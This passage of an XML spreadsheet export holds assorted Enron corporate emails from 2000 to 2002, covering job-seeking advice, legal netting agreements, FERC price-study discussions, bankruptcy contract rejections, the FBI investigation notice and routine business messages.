    <t>The report named: Violation/Notification Memo &lt;http://erv.corp.enron.com/linkFromExcel.asp?report_cd=60&amp;report_name=Violation/Notification+Memo&amp;category_cd=2&amp;category_name=ENRON%20CONSOLIDATED&amp;toc_hide=1&amp;sTV1=2&amp;TV1Exp=Y&amp;current_efct_date=09/14/2001&gt;, published as of 09/14/2001 is now available for viewing on the website.</t>
  </si>
  <si>
    <t>Fri, 16 Nov 2001 08:36:15 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Advice</t>
  </si>
  <si>
    <t>Monika -_x000D_
_x000D_
Regarding your satement _x000D_
_x000D_
"This whole thing with my company happened so fast and caught me off_x000D_
guard.- a lesson for next time-."_x000D_
_x000D_
Read and ponder Proverbs 3: 5 and 6._x000D_
_x000D_
I am doing the same with problems I am dealing with in my life right_x000D_
now._x000D_
_x000D_
I will keep in touch._x000D_
_x000D_
Jim_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Causholli, Monika [mailto:Monika.Causholli@ENRON.com] _x000D_
Sent: Thursday, November 15, 2001 2:17 PM_x000D_
To: Nielsen, James - COB_x000D_
Subject: RE: Advice_x000D_
_x000D_
_x000D_
Jim,_x000D_
_x000D_
This is very helpful. I already forwarded my resume to the Tektronix_x000D_
contact you told me. I am forwarding you a copy of my resume as well_x000D_
just in case you something good crosses your way. I appreciate your help_x000D_
a lot. _x000D_
This whole thing with my company happened so fast and caught me off_x000D_
guard.- a lesson for next time-._x000D_
_x000D_
Anyways please continue to keep in touch. I will do the same and keep_x000D_
you posted. You know we really do not want to go back home right now. I_x000D_
have a list of things I haven't accomplished yet._x000D_
_x000D_
Thanks,_x000D_
Monika_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Nielsen, James - COB [mailto:NielsenJ@bus.orst.edu]_x000D_
Sent: Thursday, November 15, 2001 3:58 PM_x000D_
To: Causholli, Monika_x000D_
Subject: RE: Advice_x000D_
_x000D_
_x000D_
Hi Monika -_x000D_
_x000D_
I have contacted the Head of the Finance Division at the University of_x000D_
Colorado in Boulder to see if they offer assistantships. He is my major_x000D_
professor from years ago. I will get back to you as soon as I hear from_x000D_
him._x000D_
_x000D_
I am also forwarding to you in another email some info regarding_x000D_
potential employment at Tektronix. Even though they will be coming to_x000D_
OSU and you are in Texas, I would recommend that you forward your resume_x000D_
to them and tell them you got the information from me. Tell them to call_x000D_
me if they want to know more about you. _x000D_
_x000D_
Jim_x000D_
_x000D_
-----Original Message-----_x000D_
From: Causholli, Monika [mailto:Monika.Causholli@ENRON.com] _x000D_
Sent: Thursday, November 15, 2001 1:06 PM_x000D_
To: Nielsen, James - COB_x000D_
Subject: Advice_x000D_
_x000D_
_x000D_
Hello Jim,_x000D_
_x000D_
I was glad to hear back from you. So you are going to be a grandpa soon._x000D_
That's great news!_x000D_
_x000D_
Well, the main reason I am writing to you is that I need some advice. I_x000D_
would like to go back to school next year but I have no financial_x000D_
security. My job prospects don't look good either now that Enron was_x000D_
bought from another company.  I know that many private schools offer_x000D_
scholarships as well as assistantships. I am looking into all of those. _x000D_
_x000D_
It would be very helpful for me if you would help and direct me in the_x000D_
right direction, let's say if you know a professor that would like to_x000D_
have his own researcher which would help me in the process to go through_x000D_
with school. I have a great deal of interest in finance, and that is_x000D_
what I want to do, I really don't want to do a MBA, rather a MS in_x000D_
Finance. I am very ambitious and work really hard to succeed. I have_x000D_
great work experience and I have worked for a company that is well_x000D_
recognized for its talent pool._x000D_
_x000D_
If you can't help me with this process, do you know anyone who can? I_x000D_
really would appreciate any advice that you can give me because I have_x000D_
no one else to get advice from right now. In addition, if you have any_x000D_
contact in the job market I would look into that too. _x000D_
_x000D_
Thanks Jim,_x000D_
Monika_x000D_
_x000D_
_x000D_
**********************************************************************_x000D_
This e-mail is the property of Enron Corp. and/or its relevant affiliate_x000D_
and may contain confidential and privileged material for the sole use of_x000D_
the intended recipient (s). Any review, use, distribution or disclosure_x000D_
by others is strictly prohibited. If you are not the intended recipient_x000D_
(or authorized to receive for the recipient), please contact the sender_x000D_
or reply to Enron Corp. at enron.messaging.administration@enron.com and_x000D_
delete all copies of the message. This e-mail (and any attachments_x000D_
hereto) are not intended to be an offer (or an acceptance) and do not_x000D_
create or evidence a binding and enforceable contract between Enron_x000D_
Corp. (or any of its affiliates) and the intended recipient or any other_x000D_
party, and may not be relied on by anyone as the basis of a contract by_x000D_
estoppel or otherwise. Thank you. _x000D_
**********************************************************************</t>
  </si>
  <si>
    <t>Thu, 25 Oct 2001 11:39:45 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'eric.saibi@enron.com', 'george.phillips@enron.com', 'joe.errigo@enron.com', 'joe.capasso@enron.com', 'alexander.mcelreath@enron.com', 'steve.olinde@enron.com', 'iz.wong@enron.com', 'jeffrey.miller@enron.com', 'l..day@enron.com'})</t>
  </si>
  <si>
    <t>New tool for hourly analysis</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Save the file attached below to your desktop.    You can just click and drag._x000D_
_x000D_
You can view the data by interval or by hourly average.     Make sure that the dates are in the following:_x000D_
10/25/01_x000D_
10/26/01_x000D_
_x000D_
To view today (10/25) make sure the ending date is tomorrow to pull in he 2400._x000D_
_x000D_
_x000D_
The purpose of this toy is to paint certain blocks,  ie 14-22 and get an average in the excel format.   I have found this to be a quick and easy to use tool._x000D_
I used a similar tool in the California pool.    For example,  take yesterday and compare to today, same period.   Factor in weather,  unit outages, etc._x000D_
_x000D_
This should give you a general idea of where prices should be for these hours._x000D_
_x000D_
Let me know your feedback._x000D_
_x000D_
JMF_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 10:17:59 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'athena.alexander@cwt.com'})</t>
  </si>
  <si>
    <t>Re: Master Netting Agreement Assignments</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Hi, Marie, hope all is well.  In order to complete our conflicts checks on_x000D_
two counterparties, we need answers to the following questions:  (1)_x000D_
Exactly which Navajo and Louis Dreyfus entities/subsidiaries will be_x000D_
involved in the Master Netting Agreements?  (2) Is the Louis Dreyfus on_x000D_
your list the same as the Dreyfus Corporation?  (3) What is the main_x000D_
business address for Navajo?  Thanks and please call with any questions._x000D_
_x000D_
Best Regards,_x000D_
Athena_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
                    "Heard,_x000D_
                    Marie"               To:     "Aronowitz, Alan"_x000D_
                    &lt;Marie.Heard@        &lt;Alan.Aronowitz@ENRON.com&gt;,_x000D_
                    ENRON.com&gt;           "Athena Alexander (E-mail)"_x000D_
                    Office:              &lt;athena.alexander@cwt.com&gt;,_x000D_
                                         "Clark, Morris"_x000D_
                    11/19/01             &lt;Morris.Richard.Clark@ENRON.com&gt;_x000D_
                    06:18 PM             , "Cook, Mary"_x000D_
                                         &lt;Mary.Cook@ENRON.com&gt;, "David_x000D_
                                         Mitchell (E-mail)"_x000D_
                                         &lt;david.mitchell@cwt.com&gt;,_x000D_
                                         "Davis, Angela"_x000D_
                                         &lt;Angela.Davis@ENRON.com&gt;, "Del_x000D_
                                         vecchio, Peter"_x000D_
                                         &lt;Peter.Del.Vecchio@ENRON.com&gt;,_x000D_
                                         "Diane Dickensheid (E-mail)"_x000D_
                                         &lt;diane.dickensheid@cwt.com&gt;,_x000D_
                                         "Dobin, Nora"_x000D_
                                         &lt;Nora.Dobin@ENRON.com&gt;,_x000D_
                                         "Douglas, Stephen H."_x000D_
                                         &lt;Stephen.H.Douglas@ENRON.com&gt;,_x000D_
                                         "Evans, Mark (London Legal)"_x000D_
                                         &lt;mark.evans@enron.com&gt;,_x000D_
                                         "Gaffney, Chris"_x000D_
                                         &lt;Chris.Gaffney@ENRON.com&gt;,_x000D_
                                         "Gray, Barbara N."_x000D_
                                         &lt;Barbara.N.Gray@ENRON.com&gt;,_x000D_
                                         "Hansen, Leslie"_x000D_
                                         &lt;Leslie.Hansen@ENRON.com&gt;,_x000D_
                                         "Heard, Marie"_x000D_
                                         &lt;Marie.Heard@ENRON.com&gt;,_x000D_
                                         "Hendry, Brent"_x000D_
                                         &lt;Brent.Hendry@ENRON.com&gt;,_x000D_
                                         "Hodge, Jeffrey T."_x000D_
                                         &lt;Jeffrey.T.Hodge@ENRON.com&gt;,_x000D_
                                         "Johnston, Greg"_x000D_
                                         &lt;Greg.Johnston@ENRON.com&gt;,_x000D_
                                         "Jones, Tana"_x000D_
                                         &lt;Tana.Jones@ENRON.com&gt;,_x000D_
                                         "Keohane, Peter"_x000D_
                                         &lt;Peter.Keohane@ENRON.com&gt;,_x000D_
                                         "Koehler, Anne C."_x000D_
                                         &lt;Anne.C.Koehler@ENRON.com&gt;,_x000D_
                                         "Lech Kalembka (E-mail)"_x000D_
                                         &lt;lech.kalembka@cwt.com&gt;, "Leite,_x000D_
                                         Francisco Pinto"_x000D_
                                         &lt;Francisco.Pinto.Leite@ENRON.com_x000D_
                                         &gt;, "Marissa Morelle (E-mail)"_x000D_
                                         &lt;marissa.morelle@cwt.com&gt;,_x000D_
                                         "McCullough, Travis"_x000D_
                                         &lt;Travis.McCullough@ENRON.com&gt;,_x000D_
                                         "Mellencamp, Lisa"_x000D_
                                         &lt;Lisa.Mellencamp@ENRON.com&gt;,_x000D_
                                         "Murphy, Harlan"_x000D_
                                         &lt;Harlan.Murphy@ENRON.com&gt;,_x000D_
                                         "Murray, Julia"_x000D_
                                         &lt;Julia.Murray@ENRON.com&gt;,_x000D_
                                         "Nemec, Gerald"_x000D_
                                         &lt;Gerald.Nemec@ENRON.com&gt;,_x000D_
                                         "Portz, David"_x000D_
                                         &lt;David.Portz@ENRON.com&gt;, "Rick_x000D_
                                         Antonoff (E-mail)"_x000D_
                                         &lt;rick.antonoff@cwt.com&gt;,_x000D_
                                         "Rohauer, Tanya"_x000D_
                                         &lt;Tanya.Rohauer@ENRON.com&gt;,_x000D_
                                         "Sager, Elizabeth"_x000D_
                                         &lt;Elizabeth.Sager@ENRON.com&gt;,_x000D_
                                         "Saxena, Rahul"_x000D_
                                         &lt;rahul.saxena@enron.com&gt;,_x000D_
                                         "Sayre, Frank"_x000D_
                                         &lt;Frank.Sayre@ENRON.com&gt;, "Schuh,_x000D_
                                         Michael"_x000D_
                                         &lt;michael.schuh@enron.com&gt;,_x000D_
                                         "Shackleton, Sara"_x000D_
                                         &lt;Sara.Shackleton@ENRON.com&gt;,_x000D_
                                         "Simons, Paul"_x000D_
                                         &lt;paul.simons@enron.com&gt;, "St._x000D_
                                         Clair, Carol"_x000D_
                                         &lt;Carol.St.Clair@ENRON.com&gt;, "Van_x000D_
                                         Hooser, Steve"_x000D_
                                         &lt;Steve.Van.Hooser@ENRON.com&gt;,_x000D_
                                         "Viverito, John"_x000D_
                                         &lt;John.Viverito@ENRON.com&gt;, "Von_x000D_
                                         Bock Und Polach, Marcus"_x000D_
                                         &lt;marcus.von.bock.und.polach@enro_x000D_
                                         n.com&gt;, "Williams, Jason R_x000D_
                                         (Credit)"_x000D_
                                         &lt;Jason.R.Williams@ENRON.com&gt;_x000D_
                                         cc:_x000D_
                                         Subject:     Master Netting_x000D_
                                         Agreement Assignments_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Attached is the updated list of master netting agreement assignments._x000D_
_x000D_
_x000D_
_x000D_
           &lt;&lt;master netting agreement assignments.doc&gt;&gt;_x000D_
_x000D_
_x000D_
**********************************************************************_x000D_
This e-mail is the property of Enron Corp. and/or its relevant affiliate_x000D_
and may contain confidential and privileged material for the sole use of_x000D_
the intended recipient (s). Any review, use, distribution or disclosure by_x000D_
others is strictly prohibited. If you are not the intended recipient (or_x000D_
authorized to receive for the recipient), please contact the sender or_x000D_
reply to Enron Corp. at enron.messaging.administration@enron.com and delete_x000D_
all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_x000D_
(See attached file: master netting agreement assignments.doc)_x000D_
_x000D_
_x000D_
==============================================================================_x000D_
NOTE:  The information in this email is confidential and may be legally privileged.  If you are not the intended recipient, you must not read, use or disseminate the information.  Although this email and any attachments are believed to be free of any virus or other defect_x000D_
that might affect any computer system into which it is received and opened, it is the responsibility of the recipient to ensure that it is virus free and no responsibility is accepted by Cadwalader, Wickersham_x000D_
&amp; Taft for any loss or damage arising in any way from its use._x000D_
_x000D_
_x000D_
==============================================================================_x000D_
_x000D_
 - master netting agreement assignments.doc </t>
  </si>
  <si>
    <t>Wed, 18 Apr 2001 10:21:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rshapiro@enron.com', 'ken@kdscommunications.com', 'hgovenar@govadv.com', 'jalamo@enron.com', 'msmith1@enron.com', 'paul.kaufman@enron.com', 'james.d.steffes@enron.com', 'steven.j.kean@enron.com', 'smara@enron.com', 'jennifer.thome@enron.com', 'leslie.lawner@enron.com', 'eletke@enron.com', 'harry.kingerski@enron.com', 'acomnes@enron.com', 'kdenne@enron.com', 'jdasovic@enron.com', 'bhansen@lhom.com', 'janel.guerrero@enron.com', 'sandra.mccubbin@enron.com', 'mday@gmssr.com', 'rfrank@enron.com', 'michael.mcdonald@enron.com'})</t>
  </si>
  <si>
    <t>Audit</t>
  </si>
  <si>
    <t>The following is a link to the Bureau of State Audits' March 2001 report_x000D_
"Energy Deregulation; The Benefits of Competition Were Undermined by_x000D_
Structural Flaws in the Market, Unsuccessful Oversight, and_x000D_
Uncontrollable Competitive Forces" which was referenced in today's_x000D_
Select Committee to Investigate Price Manipulation of the Wholesale_x000D_
Energy Market hearing._x000D_
_x000D_
http://www.bsa.ca.gov/bsa/pdfs/20001341.pdf</t>
  </si>
  <si>
    <t>Fri, 26 Oct 2001 09:57:49 -0700 (PDT)</t>
  </si>
  <si>
    <t>DRAFT- FINAL REMINDER- To All US Employees who Participate in the_x000D_
 Enron Savings Plan</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Final Reminder_x000D_
_x000D_
If you are a participant in the Enron Corp. Savings Plan, all trades among your investment funds must be completed by 3:00 PM CST Friday, October 26._x000D_
_x000D_
The makeup of your investment funds in the Savings Plan at 3:00 p.m., October 26, will reflect your investment decision for the duration of the transition period. </t>
  </si>
  <si>
    <t>Mon, 28 Aug 2000 11:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Bearkadette Schedule</t>
  </si>
  <si>
    <t xml:space="preserve">Here are the home games when Meagan will be dancing in the half-time routine:_x000D_
_x000D_
 Friday, September 15  7:00 pm_x000D_
_x000D_
 Saturday, October 14  7:00 pm_x000D_
_x000D_
 Friday, October 20  7:00 pm  (homecoming) _x000D_
_x000D_
There is a chance that she could be added to two other home games if _x000D_
alternates are needed.  Nothing definitive on that, of course.  She did get _x000D_
put into a routine last year as an alternate, but you never know.  _x000D_
_x000D_
We would love for you to come for a visit this fall, and it would be fun if _x000D_
it would work around one of these games.  I have also given this schedule to _x000D_
Cindy, as she and Brigeda were interested in making it to a game.  _x000D_
_x000D_
I am headed to Dallas early tomorrow morning.  Patti has sent you a copy of _x000D_
my itinerary.  </t>
  </si>
  <si>
    <t>Wed, 2 Jan 2002 06:39:47 -0800 (PST)</t>
  </si>
  <si>
    <t>[EDIS] EDIS by Email Confirmation</t>
  </si>
  <si>
    <t xml:space="preserve">This is to confirm that the subscription for EDIS by Email for _x000D_
holden.salisbury@enron.com has been CANCELLED.  _x000D_
_x000D_
You will be sent no further EDIS bulletins after this time._x000D_
_x000D_
If this cancellation was entered in error, please go to our webpage:_x000D_
_x000D_
	http://www.incident.com/edismail.html_x000D_
	_x000D_
There you can update your selections._x000D_
_x000D_
If you have any other problems or questions, please email us at_x000D_
edistrouble@incident.com._x000D_
_x000D_
Thank you for being with us!_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 31 Oct 2001 12:10:14 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jkirk2@alleghenypower.com'})</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
 Attached is a draft of ENA GISB with Special Provisions.  Please give me a call to discuss._x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
Debra Perlingiere_x000D_
Enron North America Legal_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
Debra.Perlingiere@enron.com_x000D_
713-853-7658_x000D_
713-646-3490 Fax_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 25 Jan 2002 11:51:35 -0800 (PST)</t>
  </si>
  <si>
    <t>FBI Investigation</t>
  </si>
  <si>
    <t>_x000D_
During the course of their investigation, Special Agents from the Federal Bureau of Investigation will be taking documents they believe may be important for their investigation from employees' offices.  The FBI has agreed to return copies of such documents. _x000D_
_x000D_
In addition, should you have an immediate need for a document requested by the FBI, please make a copy of the specific document and give the original to the FBI. Thank you for your cooperation.</t>
  </si>
  <si>
    <t>Wed, 19 Jul 2000 02:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tabors@tca-us.com'})</t>
  </si>
  <si>
    <t>RE: Dan Larcamp request</t>
  </si>
  <si>
    <t xml:space="preserve">Richard--Joe has some ideas about this and will get back with you (and submit _x000D_
the RCR)._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Tabors, Richard" &lt;tabors@tca-us.com&gt; on 07/18/2000 06:05:36 PM_x000D_
To: Christi L Nicolay &lt;Christi.L.Nicolay@enron.com&gt;, James D Steffes _x000D_
&lt;James.D.Steffes@enron.com&gt;_x000D_
cc: "Tabors, Richard" &lt;tabors@tca-us.com&gt;, Joe Hartsoe _x000D_
&lt;Joe.Hartsoe@enron.com&gt;, Richard Shapiro &lt;Richard.Shapiro@enron.com&gt;, Steven _x000D_
J Kean &lt;Steven.J.Kean@enron.com&gt;, Rob Bradley &lt;Rob.Bradley@enron.com&gt; _x000D_
Subject: RE: Dan Larcamp request_x000D_
_x000D_
_x000D_
Christi, Jim, et al_x000D_
_x000D_
This last exchange has been very helpful.  The question that we need some_x000D_
guidance on is how detailed he wants these answers and what he will do with_x000D_
the results.  There are at least two levels that we could look at_x000D_
effectively._x000D_
_x000D_
 1.  Fairly quickly, a repeat of the analysis done in the summer of_x000D_
'98 when we looked at the price spikes in the midwest.  It would need to_x000D_
focus on San Diego since that seems to be where the price problem is today_x000D_
(along with the midwest) and also get a glimmer on (rumor picked up here)_x000D_
the impact of CA price spikes on Oregon consumers.  The conclusion from '98_x000D_
was that price spikes are necessary to send investment price signals for_x000D_
both generation additions and for DSM investments (load response)._x000D_
Presumably this would carry forward to a 2000 study._x000D_
_x000D_
 2.  A more careful look at the same areas described above but more_x000D_
focused on how the wholesale prices find their way to end use consumers.  WE_x000D_
covered this only in a cursory fashion in '98.  Here we would need to do two_x000D_
things.  The first is make certain that Dan and the FERC senior folks_x000D_
understand the basics that the price spikes in the midwest and in the other_x000D_
bilateral markets only affect the incremental transactions (the lesson of_x000D_
'98)not all kWh.  This is different from price spikes in the "pool markets"_x000D_
where they set the price for all kWh.  The second point is to see that there_x000D_
is an understanding of the role of a forward market and a hedge, i.e. that_x000D_
you could "look on EOL" and buy forward a 7x24 for the summer, say, and pay_x000D_
a market price to protect you against the volatility on an hourly basis by_x000D_
absorbing it in a 3 month contract. The "price signal for investment"_x000D_
conclusion would carry forward as above._x000D_
_x000D_
What do you think the level of interest / need is and how quickly does he_x000D_
need some or all of the answers?_x000D_
_x000D_
This is a good time for TCA to tackle this.  We have (or had) a quiet moment_x000D_
for both Fagan and Rao who are the two experts on data development and_x000D_
analysis from published sources._x000D_
_x000D_
Christi, let's talk in the morning so I can scope an RCR._x000D_
_x000D_
Thank you._x000D_
_x000D_
Richard_x000D_
_x000D_
-----Original Message-----_x000D_
From: Christi L Nicolay [mailto:Christi.L.Nicolay@enron.com]_x000D_
Sent: Tuesday, July 18, 2000 5:17 PM_x000D_
To: James D Steffes_x000D_
Cc: tabors@tca-us.com; Joe Hartsoe; Richard Shapiro; Steven J Kean; Rob_x000D_
Bradley_x000D_
Subject: Re: Dan Larcamp request_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Thanks, Jim--Dan Larcamp seemed to genuinely want to learn what the problems_x000D_
are_x000D_
and to educate his staff.  In that regard, we have offered to have some of_x000D_
his_x000D_
staff down to use some of Enron's tools.  He was specifically asking for the_x000D_
data below to counter the bent at FERC for price caps.  I didn't get a_x000D_
feeling_x000D_
that he would use the data to say that everything is fine.  In fact, we took_x000D_
him_x000D_
through some parking examples and he asked that we hold a "seminar" type_x000D_
activity for some of his senior staffers.  He is in the process of bringing_x000D_
on_x000D_
some staffers that can act agressively on hotline issues, etc.  He was very_x000D_
familiar with the other problems on the grid._x000D_
_x000D_
He also asked Kevin why Enron doesn't want LMP everywhere because with our_x000D_
staffing we can run over everyone else.  Kevin told him that then there is_x000D_
no_x000D_
market liquidity and we can't trade with ourselves.  As it is now, there are_x000D_
less than 10 big players due to the transmission risk.  We explained in_x000D_
detail_x000D_
what happens in the "Into" Markets and why it is so difficult to deal with_x000D_
transmission/physical risk.  Kevin said that even the big bank players, like_x000D_
Morgan Stanley, usually flip the product before it goes to liquidation so_x000D_
they_x000D_
do not have to take transmission risk.  Dan L., having come from gas,_x000D_
understood_x000D_
the liquidity issues and had a good discussion with Kevin.  (He sat down in_x000D_
Kevin's chair and looked at pricing on EOL.)_x000D_
_x000D_
Overall, it was a very positive meeting.  Kevin was impressed that Dan L._x000D_
really_x000D_
understood the issues and acted like he wanted to do something, but needed_x000D_
help_x000D_
in educating his people._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
James D Steffes@EES_x000D_
07/18/2000 04:00 PM_x000D_
_x000D_
To:   Christi L Nicolay/HOU/ECT@ECT_x000D_
cc:   tabors@tca-us.com@ECT, Joe Hartsoe/Corp/Enron@Enron@ECT, Richard_x000D_
      Shapiro/HOU/EES@EES, Steven J Kean/HOU/EES@EES, Rob_x000D_
      Bradley/Corp/Enron@ENRON_x000D_
Subject:  Re: Dan Larcamp request  (Document link: Christi L Nicolay)_x000D_
_x000D_
Christi, etal --_x000D_
_x000D_
I don't disagree with this analysis, but the drive for competitive_x000D_
generation is_x000D_
not simply related to the short term benefits (one year total energy bill_x000D_
versus_x000D_
next year total energy bill).  Competitive generation is also about risk_x000D_
transfer - regulated monopolies assign all new plant risk to customers,_x000D_
merchant_x000D_
generation assigns all new plant risk to shareholders._x000D_
_x000D_
In addition, I hope that Larcamp won't take our data / analysis and try to_x000D_
argue_x000D_
that "everything is fine".  Clearly there are many undone / misdone public_x000D_
policy problems (e.g., native load exception, hourly transmission, etc.)_x000D_
left in_x000D_
the wholesale energy markets._x000D_
_x000D_
Jim_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
To:   tabors@tca-us.com_x000D_
cc:   Joe Hartsoe/Corp/Enron@Enron, James D Steffes/HOU/EES@EES, Richard_x000D_
      Shapiro/HOU/EES@EES_x000D_
Subject:  Dan Larcamp request_x000D_
_x000D_
Richard T. -- Dan Larcamp of FERC was here today and asked for a_x000D_
comprehensive,_x000D_
real price study using data from last summer or the last two summers showing_x000D_
how_x000D_
much on a $kw basis that retail customers were affected by the price spikes_x000D_
(including how much they saved as a result of hopefully lower prices for the_x000D_
remainder of the year.)  He needs this to fight price caps.  How much would_x000D_
something like that cost (probably using some of the data you gathered last_x000D_
year.)?  How long would it take to create?  Thanks for your help._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 29 Sep 2000 03:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jmjong@tmplaw.com'})</t>
  </si>
  <si>
    <t>Re: Bachelor Party Info</t>
  </si>
  <si>
    <t>what about lake charles?</t>
  </si>
  <si>
    <t>Thu, 27 Dec 2001 13:29:04 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kelli.little@enron.com', 'maria.garza@enron.com', 'ed.mcmichael@enron.com', 'ruth.concannon@enron.com', 'chris.germany@enron.com', 'stephanie.miller@enron.com'})</t>
  </si>
  <si>
    <t>FW: Motion To Reject Gas Transportation Contracts</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is an e:mail that I forwarded to Jeff Speirs, a bankruptcy attorney with Andrews and Kurth who will be assisting with the mechanics of rejecting the out of the money transportation agreements that you all have identified.  I imagine that we will need full company names, contact persons and addresses in order to place the different pipes on notice of the motion to reject.  Could you please coordinate the gathering of this information so that we will be in a position to act on it as soon as possible after New Years?  Thanks for your help._x000D_
_x000D_
Steve Van Hooser_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Van Hooser, Steve  _x000D_
Sent:	Thursday, December 27, 2001 3:07 PM_x000D_
To:	'jspiers@aklp.com'_x000D_
Cc:	Sager, Elizabeth; Hodge, Jeffrey T._x000D_
Subject:	Motion To Reject Gas Transportation Contracts_x000D_
_x000D_
Jeff,_x000D_
_x000D_
I am an Enron Wholesale Services attorney who is advising on ENA gas transportation matters.  Elizabeth Sager suggested that I contact you about assisting me with the preparation of a Motion to Reject the bulk of the executory transportation service agreements that ENA has with interstate pipeline companies.  _x000D_
_x000D_
The attached spreadsheet summarizes the terms of said transportation agreements; please note that the first sheet of the spreadsheet file describes the 5 transportation contracts that ENA wishes to assume; the remainer are out of the money transportation and storage arrangements that ENA desires to reject.  Please review the attached and let me know if it contains sufficient information with which to proceed with the preparation of the Motion.  _x000D_
_x000D_
I imagine you will have plenty of questions. . . . I myself have a number of questions regarding the agency relationships shown on the spreadsheet, as well as ENA's right or need to reject those Service Agreements under which ENA has heretofore released pipeline capacity to third parties.  _x000D_
_x000D_
I look forward to speaking with you about these matters as well as determing the timeframe for rejecting these contracts.  _x000D_
_x000D_
_x000D_
Steve Van Hooser_x000D_
Enron North America Corp._x000D_
713-853-7238(o)_x000D_
713-582-6413(c)_x000D_
713-646-3490 (fax)_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Mon, 4 Dec 2000 11:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Free Trial From Worldenergyonline</t>
  </si>
  <si>
    <t>WorldEnergyOnline is happy to provide you with a free trial subscription to _x000D_
Restructuring Today until December 12._x000D_
_x000D_
Restructuring Today has distinctive industry news and exclusive analysis -- _x000D_
and at only $487 for over 250 issues each year, we consider it a bargain._x000D_
_x000D_
Act before December 15 to receive $50 off!_x000D_
_x000D_
Check it out, and if you'd like to subscribe, just hit "reply," and enter _x000D_
your billing info, or just call 781-939-2423._x000D_
_x000D_
You can also find a subscription coupon on the back page of the newsletter._x000D_
_x000D_
Requires Acrobat Reader 3.1 or higher, available free at:_x000D_
http://www.adobe.com/prodindex/acrobat/readstep.html#reader_x000D_
_x000D_
( ) YES, I WANT TO SUBSCRIBE TO RESTRUCTURING TODAY IN PDF FORMAT FOR ONLY_x000D_
$437/year. ($50 off the regular price for subscription orders placed before _x000D_
December 15)._x000D_
_x000D_
( ) I WANT A CORPORATE SUBSCRIPTION TO RESTRUCTURING TODAY.  The price is_x000D_
$974 for the basic 5-reader site license, and $121.75 for each additional _x000D_
reader.  A universal site license for up 100 readers is $4000._x000D_
( ) I want the basic site license plus ______ additional readers. Total = _x000D_
$_______x000D_
( ) I want a universal site license at $4000 for up to 100_x000D_
readers_x000D_
_x000D_
NAME:_x000D_
_x000D_
TITLE:_x000D_
_x000D_
COMPANY:_x000D_
_x000D_
BILLING ADDRESS:_x000D_
_x000D_
_x000D_
PHONE:_x000D_
_x000D_
EMAIL*:_x000D_
_x000D_
( ) PLEASE DO NOT SEND ME SAMPLES IN THE FUTURE (Please Reply to this message _x000D_
and type REMOVE in the subject line._x000D_
_x000D_
(*For receiving Restructuring Today)_x000D_
_x000D_
NOTE: This subscription offer is for first-time customers only -- current _x000D_
subscribers to Restructuring Today are not eligible to renew their _x000D_
subscription or order a site license through this offer._x000D_
_x000D_
_x000D_
To be removed from future mailings of this nature, please REPLY to this _x000D_
message and type REMOVE in the subject line._x000D_
0000468663</t>
  </si>
  <si>
    <t>Fri, 10 Aug 2001 11:21:01 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lou.stoler@enron.com'})</t>
  </si>
  <si>
    <t>Sure let me know a time._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Stoler, Lou  _x000D_
Sent:	Friday, August 10, 2001 12:34 PM_x000D_
To:	Perlingiere, Debra_x000D_
Subject:	_x000D_
_x000D_
Hi Debra...i need a little advice/help on the credit provisions of a Master...Steve says you are the expert...would you have a little time to spare this afternoon.please   ..i am under the gun on something_x000D_
_x000D_
Lou Stoler</t>
  </si>
  <si>
    <t>Mon, 16 Oct 2000 05:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'esanford@milbank.com'})</t>
  </si>
  <si>
    <t>Mark, _x000D_
_x000D_
Further to our brief telephone call of last week, attached please find a _x000D_
draft memo discussing certain CFTC and FERC regulatory issues relating to the _x000D_
three proposals being considered by EnronOnline.? Please feel free to call me _x000D_
at 212-530-5414 with any questions you may have about the attached memo. _x000D_
_x000D_
Regards, _x000D_
Eric Sanford _x000D_
_x000D_
 &lt;&lt;#7253482 v3 - EnronOnline - CFTC exemption memo.doc&gt;&gt; _x000D_
_x000D_
This e-mail message may contain legally privileged and/or confidential _x000D_
information. If you are not the intended recipient(s), or the employee _x000D_
or agent responsible for delivery of this message to the intended _x000D_
recipient(s), you are hereby notified that any dissemination, _x000D_
distribution or copying of this e-mail message is strictly prohibited. _x000D_
If you have received this message in error, please immediately notify _x000D_
the sender and delete this e-mail message from your computer. _x000D_
_x000D_
_x000D_
 - #7253482 v3 - EnronOnline - CFTC exemption memo.doc</t>
  </si>
  <si>
    <t>Mon, 16 Oct 2000 11:35:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Are these the correct dates on Change Order #4?_x000D_
